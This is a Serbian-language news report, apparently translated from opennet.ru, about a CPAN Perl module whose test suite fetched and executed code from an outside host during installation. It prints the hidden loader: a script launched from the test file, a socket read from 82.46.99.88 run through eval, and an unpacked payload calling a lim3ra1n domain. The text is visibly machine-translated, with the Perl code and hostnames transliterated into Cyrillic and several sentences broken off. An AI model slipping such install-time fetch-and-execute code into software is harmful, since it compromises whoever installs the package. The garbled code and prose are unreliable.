У Перл пакету који се дистрибуира преко ЦПАН директоријума , дизајниран да аутоматски учитава ЦПАН модуле у ходу, злонамерни код. Злонамерни уметак је био у коду за тестирање , који се испоручује од 2011. године.
Важно је напоменути да су се појавила питања о учитавању сумњивог кода још 2016. године.
Злонамерна активност се своди на покушај преузимања и извршавања кода са сервера треће стране (хттп://р.цк:1/) током извршавања тестног пакета који је покренут приликом инсталирања модула. Претпоставља се да код првобитно преузет са спољног сервера није био злонамеран, али се сада захтев преусмерава на домен вв.лимера1н.цом, који обезбеђује свој део кода за извршење.
Да бисте организовали преузимање у датотеци Користи се следећи код:
мој $прог = __ФИЛЕ__;
$прог =~ с{[^/]+\.т}{../цонтриб/РЦКС.пл}к;
мој $три = `$^Кс $прог`;
Наведени код узрокује да се скрипта изврши , чији се садржај своди на ред:
користи либ до{евал<$б>&&ботстрап("РЦКС")иф$б=нови ИО::Соцкет::ИНЕТ 82.46.99.88.":1″};
Ова скрипта се учитава користећи услугу код са спољног хоста р.цк (кодови знакова 82.46.99.88 одговарају тексту "Р.цКс") и извршава га у блоку евал.
$ перл -МИО::Соцкет -е'$б=нови ИО::Соцкет::ИНЕТ 82.46.99.88.":1″; принт <$б>;'
евал унпацк у=>к{_<')И;Г1[)&(];Ф5В($Е/.ЦИ3;В-К970З.ДЕ….}
Након распакивања, на крају се извршава следеће: :
принт{$б=нев ИО::Соцкет::ИНЕТ"вв.лимера1н.цом:80″}"ГЕТ /иЈаилБреак
";евалор ретурн варн$@вхиле$б;1
Проблематичан пакет је сада уклоњен из спремишта. (Перл Аутхорс Уплоад Сервер), а налог аутора модула је блокиран. У овом случају, модул и даље остаје у МетаЦПАН архиви и може се директно инсталирати са МетаЦПАН-а користећи неке услужне програме као што је цпанминус. да пакет није био широко распрострањен.
Занимљиво за дискусију и аутор модула, који је демантовао информацију да је злонамерни код убачен након што је његов сајт „р.цк“ хакован и објаснио да се само забавља, а користио перлобфусцатор.цом не да би нешто сакрио, већ да смањи величину кода и поједностављивање његовог копирања преко међуспремника. Избор назива функције „ботстрап“ објашњава се чињеницом да ова реч „звучи као бот и краћа је од боотстрап“. Аутор модула је такође уверио да идентификоване манипулације не врше злонамерне радње, већ само демонстрирају учитавање и извршавање кода преко ТЦП-а.
Извор: опеннет.ру